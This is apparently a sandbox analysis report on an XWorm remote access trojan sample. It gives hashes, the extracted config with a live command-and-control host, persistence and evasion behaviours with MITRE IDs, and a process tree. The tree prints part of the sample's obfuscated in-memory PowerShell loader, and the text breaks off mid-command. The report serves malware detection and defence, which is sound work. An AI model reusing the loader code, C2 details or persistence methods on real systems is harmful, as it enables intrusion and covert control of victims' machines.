xworm | a353bc34e2efa3ea7e4c04bb9d49c70ca45cdd151ed5519d946664b9c5c9282b

Analysis

max time kernel
150s
max time network
155s
platform
windows11-21h2_x64
resource
win11-20250218-en
resource tags

arch:x64arch:x86image:win11-20250218-enlocale:en-usos:windows11-21h2-x64system
submitted
09/03/2025, 14:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

XClient66.exe
Size

501KB
MD5

51e015f908d007651a56ba603c142b12
SHA1

8fe6b8e61426c8a49a778de6f18ce568d58f2a9d
SHA256

a353bc34e2efa3ea7e4c04bb9d49c70ca45cdd151ed5519d946664b9c5c9282b
SHA512

e598ed359d23173889046499c4093c739a80a044724aae16c4bb483311f0ad80357df7b7dd10f9a6cf12084a4009b18927adde3210ec6bebdf8dd57da997a9ad
SSDEEP

12288:EItyU3DTkV1ilKya0FOUuQ0gH+kmtbF6W05EJXp107sd:RxkGTy

Score

10^/10

xworm defense_evasion discovery execution persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

client-presence.gl.at.ply.gg:50976

Mutex

ZVJ9lOsEvNQZTKC6

Attributes

Install_directory
%AppData%
install_file
DeadM.exe

aes.plain

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral3/files/0x001a00000002affb-6.dat	family_xworm
behavioral3/memory/2476-15-0x00000000003B0000-0x00000000003C0000-memory.dmp	family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 2116 created 644	2116	powershell.EXE	5

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeadM.lnk	DeadMdzj.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeadM.lnk	DeadMdzj.exe

Executes dropped EXE 7 IoCs

pid	Process
2400	DeadMdzj.exe
2476	DeadMdzj.exe
4000	DeadR.exe
1936	DeadR.exe
3544	DeadM.exe
1652	DeadM.exe
1628	DeadM.exe

Indicator Removal: Clear Windows Event Logs 1 TTPs 1 IoCs

Clear Windows Event Logs to hide the activity of an intrusion.

defense_evasion

Clear Windows Event Logs

T1070.001

description	ioc	Process
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2287204051-441334380-1151193565-1000\Software\Microsoft\Windows\CurrentVersion\Run\DeadM = "C:\\Users\\Admin\\AppData\\Roaming\\DeadM.exe"	DeadMdzj.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2116	powershell.EXE

Drops file in System32 directory 8 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\DeadM	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2116 set thread context of 3188	2116	powershell.EXE	91

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp\edge_BITS_1140_1993213797\BIT7D8D.tmp	svchost.exe
File opened for modification	C:\Windows\SystemTemp\edge_BITS_1140_1993213797\0529a13c-ea24-474d-87d7-66f668b071b4	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DeadR.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DeadR.exe

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wmiprvse.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key security queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wmiprvse.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information	wmiprvse.exe

Modifies data under HKEY_USERS 56 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Sun, 09 Mar 2025 14:56:39 GMT"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={0052F335-ADAC-4F15-AEB7-389FE68556D6}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1741532199"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1656	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2116	powershell.EXE
2116	powershell.EXE
2116	powershell.EXE
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe
3188	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2476	DeadMdzj.exe
Token: SeDebugPrivilege	2400	DeadMdzj.exe
Token: SeDebugPrivilege	2116	powershell.EXE
Token: SeDebugPrivilege	2116	powershell.EXE
Token: SeDebugPrivilege	3188	dllhost.exe
Token: SeShutdownPrivilege	3220	Explorer.EXE
Token: SeCreatePagefilePrivilege	3220	Explorer.EXE
Token: SeAuditPrivilege	2608	svchost.exe
Token: SeDebugPrivilege	2476	DeadMdzj.exe
Token: SeShutdownPrivilege	3220	Explorer.EXE
Token: SeCreatePagefilePrivilege	3220	Explorer.EXE
Token: SeShutdownPrivilege	3220	Explorer.EXE
Token: SeCreatePagefilePrivilege	3220	Explorer.EXE
Token: SeShutdownPrivilege	3220	Explorer.EXE
Token: SeCreatePagefilePrivilege	3220	Explorer.EXE
Token: SeAssignPrimaryTokenPrivilege	2680	svchost.exe
Token: SeIncreaseQuotaPrivilege	2680	svchost.exe
Token: SeSecurityPrivilege	2680	svchost.exe
Token: SeTakeOwnershipPrivilege	2680	svchost.exe
Token: SeLoadDriverPrivilege	2680	svchost.exe
Token: SeSystemtimePrivilege	2680	svchost.exe
Token: SeBackupPrivilege	2680	svchost.exe
Token: SeRestorePrivilege	2680	svchost.exe
Token: SeShutdownPrivilege	2680	svchost.exe
Token: SeSystemEnvironmentPrivilege	2680	svchost.exe
Token: SeUndockPrivilege	2680	svchost.exe
Token: SeManageVolumePrivilege	2680	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2680	svchost.exe
Token: SeIncreaseQuotaPrivilege	2680	svchost.exe
Token: SeSecurityPrivilege	2680	svchost.exe
Token: SeTakeOwnershipPrivilege	2680	svchost.exe
Token: SeLoadDriverPrivilege	2680	svchost.exe
Token: SeSystemtimePrivilege	2680	svchost.exe
Token: SeBackupPrivilege	2680	svchost.exe
Token: SeRestorePrivilege	2680	svchost.exe
Token: SeShutdownPrivilege	2680	svchost.exe
Token: SeSystemEnvironmentPrivilege	2680	svchost.exe
Token: SeUndockPrivilege	2680	svchost.exe
Token: SeManageVolumePrivilege	2680	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2680	svchost.exe
Token: SeIncreaseQuotaPrivilege	2680	svchost.exe
Token: SeSecurityPrivilege	2680	svchost.exe
Token: SeTakeOwnershipPrivilege	2680	svchost.exe
Token: SeLoadDriverPrivilege	2680	svchost.exe
Token: SeSystemtimePrivilege	2680	svchost.exe
Token: SeBackupPrivilege	2680	svchost.exe
Token: SeRestorePrivilege	2680	svchost.exe
Token: SeShutdownPrivilege	2680	svchost.exe
Token: SeSystemEnvironmentPrivilege	2680	svchost.exe
Token: SeUndockPrivilege	2680	svchost.exe
Token: SeManageVolumePrivilege	2680	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2680	svchost.exe
Token: SeIncreaseQuotaPrivilege	2680	svchost.exe
Token: SeSecurityPrivilege	2680	svchost.exe
Token: SeTakeOwnershipPrivilege	2680	svchost.exe
Token: SeLoadDriverPrivilege	2680	svchost.exe
Token: SeSystemtimePrivilege	2680	svchost.exe
Token: SeBackupPrivilege	2680	svchost.exe
Token: SeRestorePrivilege	2680	svchost.exe
Token: SeShutdownPrivilege	2680	svchost.exe
Token: SeSystemEnvironmentPrivilege	2680	svchost.exe
Token: SeUndockPrivilege	2680	svchost.exe
Token: SeManageVolumePrivilege	2680	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	2680	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3508 wrote to memory of 2400	3508	XClient66.exe	85
PID 3508 wrote to memory of 2400	3508	XClient66.exe	85
PID 3508 wrote to memory of 2476	3508	XClient66.exe	86
PID 3508 wrote to memory of 2476	3508	XClient66.exe	86
PID 3508 wrote to memory of 4000	3508	XClient66.exe	87
PID 3508 wrote to memory of 4000	3508	XClient66.exe	87
PID 3508 wrote to memory of 4000	3508	XClient66.exe	87
PID 3508 wrote to memory of 1936	3508	XClient66.exe	88
PID 3508 wrote to memory of 1936	3508	XClient66.exe	88
PID 3508 wrote to memory of 1936	3508	XClient66.exe	88
PID 2116 wrote to memory of 3188	2116	powershell.EXE	91
PID 2116 wrote to memory of 3188	2116	powershell.EXE	91
PID 2116 wrote to memory of 3188	2116	powershell.EXE	91
PID 2116 wrote to memory of 3188	2116	powershell.EXE	91
PID 2116 wrote to memory of 3188	2116	powershell.EXE	91
PID 2116 wrote to memory of 3188	2116	powershell.EXE	91
PID 2116 wrote to memory of 3188	2116	powershell.EXE	91
PID 2116 wrote to memory of 3188	2116	powershell.EXE	91
PID 3188 wrote to memory of 644	3188	dllhost.exe	5
PID 3188 wrote to memory of 704	3188	dllhost.exe	7
PID 3188 wrote to memory of 1008	3188	dllhost.exe	12
PID 3188 wrote to memory of 464	3188	dllhost.exe	13
PID 3188 wrote to memory of 760	3188	dllhost.exe	14
PID 3188 wrote to memory of 772	3188	dllhost.exe	15
PID 3188 wrote to memory of 1048	3188	dllhost.exe	16
PID 3188 wrote to memory of 1120	3188	dllhost.exe	18
PID 3188 wrote to memory of 1132	3188	dllhost.exe	19
PID 3188 wrote to memory of 1184	3188	dllhost.exe	20
PID 3188 wrote to memory of 1228	3188	dllhost.exe	21
PID 3188 wrote to memory of 1280	3188	dllhost.exe	22
PID 3188 wrote to memory of 1304	3188	dllhost.exe	23
PID 3188 wrote to memory of 1344	3188	dllhost.exe	24
PID 3188 wrote to memory of 1464	3188	dllhost.exe	25
PID 3188 wrote to memory of 1552	3188	dllhost.exe	26
PID 3188 wrote to memory of 1560	3188	dllhost.exe	27
PID 3188 wrote to memory of 1664	3188	dllhost.exe	28
PID 3188 wrote to memory of 1704	3188	dllhost.exe	29
PID 3188 wrote to memory of 1720	3188	dllhost.exe	30
PID 3188 wrote to memory of 1808	3188	dllhost.exe	31
PID 3188 wrote to memory of 1856	3188	dllhost.exe	32
PID 3188 wrote to memory of 2028	3188	dllhost.exe	33
PID 3188 wrote to memory of 2036	3188	dllhost.exe	34
PID 3188 wrote to memory of 2044	3188	dllhost.exe	35
PID 3188 wrote to memory of 1788	3188	dllhost.exe	36
PID 3188 wrote to memory of 2080	3188	dllhost.exe	37
PID 3188 wrote to memory of 2204	3188	dllhost.exe	39
PID 3188 wrote to memory of 2380	3188	dllhost.exe	40
PID 3188 wrote to memory of 2460	3188	dllhost.exe	41
PID 3188 wrote to memory of 2468	3188	dllhost.exe	42
PID 3188 wrote to memory of 2524	3188	dllhost.exe	43
PID 3188 wrote to memory of 2608	3188	dllhost.exe	44
PID 3188 wrote to memory of 2632	3188	dllhost.exe	45
PID 3188 wrote to memory of 2672	3188	dllhost.exe	46
PID 3188 wrote to memory of 2680	3188	dllhost.exe	47
PID 3188 wrote to memory of 2688	3188	dllhost.exe	48
PID 3188 wrote to memory of 3028	3188	dllhost.exe	50
PID 3188 wrote to memory of 2224	3188	dllhost.exe	51
PID 3188 wrote to memory of 3148	3188	dllhost.exe	52
PID 3188 wrote to memory of 3220	3188	dllhost.exe	53
PID 3188 wrote to memory of 3476	3188	dllhost.exe	54
PID 3188 wrote to memory of 3500	3188	dllhost.exe	55
PID 3188 wrote to memory of 3852	3188	dllhost.exe	58
PID 3188 wrote to memory of 3904	3188	dllhost.exe	59
PID 3188 wrote to memory of 4008	3188	dllhost.exe	60

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:644
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:464
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{0242c45e-4f89-4c21-9878-792ab56448bb}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3188

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:704

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:1008

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:760

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:772

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1048

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1120

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1132
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:uwIwcQOyyeLc{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$AxpBCggczbwmrL,[Parameter(Position=1)][Type]$EIZxmGtzKS)$DSsBsYIyGDN=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+'eg'+[Char](97)+''+'t'+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+''+'M'+''+'e'+''+[Char](109)+''+'o'+''+[Char](114)+'y'+'M'+''+[Char](111)+''+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+'T'+''+'y'+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+'l'+'a'+'s'+'s'+','+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+''+'e'+''+'a'+''+[Char](108)+''+[Char](101)+'d'+[Char](44)+'Ans'+'i'+''+'C'+''+[Char](108)+''+'a'+''+'s'+''+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'l'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$DSsBsYIyGDN.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+'a'+[Char](109)+''+'e'+''+','+''+'H'+''+'i'+''+[Char](100)+''+'e'+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+'u'+'b'+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$AxpBCggczbwmrL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+'nag'+[Char](101)+'d');$DSsBsYIyGDN.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+'B'+''+'y'+'Si'+[Char](103)+''+','+'N'+[Char](101)+''+[Char](119)+'S'+[Char](108)+''+[Char](111)+''+[Char](116)+','+[Char](86)+''+[Char](105)+''+[Char](114)+'tua'+[Char](108)+'',$EIZxmGtzKS,$AxpBCggczbwmrL).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+'d');Write-Output $DSsBsYIyGDN.CreateType();}$QIehSJyxROlos=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+'t'+[Char](101)+''+[Char](109)+''+[Char](46)+'d'+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+''+[Char](114)+''+[Char](111)+'s'+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+'W'+'i'+'n3'+[Char](50)+''+[Char](46)+''+'U'+''+[Char](110)+''+'s'+''+'a'+''+[Char](102)+'eNat'+'i'+''+'v'+''+[Char](101)+''+'M'+''+'e'+'t'+[Char](104)+'o'+[Char](100)+''+[Char](115)+'');$xoaBFCVDwPEVSi=$QIehSJyxROlos.GetMethod(''+[Char](71)+'e'+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+'d'+'d'+[Char](114)+'ess',[Reflection.BindingFlags]('P'+[Char](117)+''+'b'+'l'+[Char](105)+'c'+[Char](44)+''+'S'+''+[Char](116)+''+'a'+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$IhrYRiqTtxinQnhInJD=uwIwcQOyyeLc @([String])([IntPtr]);$HXIdpQQgNMxMqnHyfbJFPn=uwIwcQOyyeLc 